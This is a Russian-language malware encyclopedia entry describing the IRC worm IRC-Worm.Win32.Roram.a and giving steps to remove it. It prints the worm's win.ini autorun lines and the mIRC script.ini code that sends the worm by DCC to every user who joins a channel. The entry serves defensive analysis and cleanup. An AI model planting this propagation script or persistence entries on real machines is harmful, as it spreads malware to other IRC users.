IRC-Worm.Win32.Roram.a

Материал из Total Malware Info

Перейти к: навигация, поиск

IRC-Worm.Win32.Roram.a Червь распространяющий себя через IRC. Является приложением Windows (PE-EXE файл). Имеет размер 4 096 байт.

Инсталляция

Копирует свой исполняемый файл как: 

C:\Windows\Reiop.exe

Для автоматического запуска при следующем старте системы червь добавляет ссылку на свой исполняемый файл в файл настроек Windows: c:\windows\win.ini: 

[windows]
load=C:\Windows\Reiop.exe
run=C:\Windows\Reiop.exe

Деструктивная активность

Записывает в файл скриптов программы mIRC - C:\Programme\mIRC\script.ini следующие строки: 

[script]
n0=on 1:join:*.*:
n1={ if ( $nick==$me) {halt}
n2=/dcc send $nick C:\Windows\Reiop.exe
n3=}

Данный скрипт расссылает исполняемый файл червя по сервису DCC всем присоединяющимся к каналу клиентам.

Рекомендации по удалению

Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:

  1. При помощи ("Диспетчера задач") завершить процесс червя.
  2. Удалить оригинальный файл червя (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
  3. Удалить следующие строки из файла c:\windows\win.ini:
    4. load=C:\Windows\Reiop.exe
run=C:\Windows\Reiop.exe
  4. Удалить следующие строки из файла:
    5. n0=on 1:join:*.*:
n1={ if ( $nick==$me) {halt}
n2=/dcc send $nick C:\Windows\Reiop.exe
n3=}
  5. Удалить файл:
    6. C:\Windows\Reiop.exe
Источник — «http://www.totalmalwareinfo.com/rus/IRC-Worm.Win32.Roram.a»
Язык
Видеокурс
Computer and Internet Security Video Tutorials
© 2011 ООО «Лаборатория дизайн и тест». Все права защищены.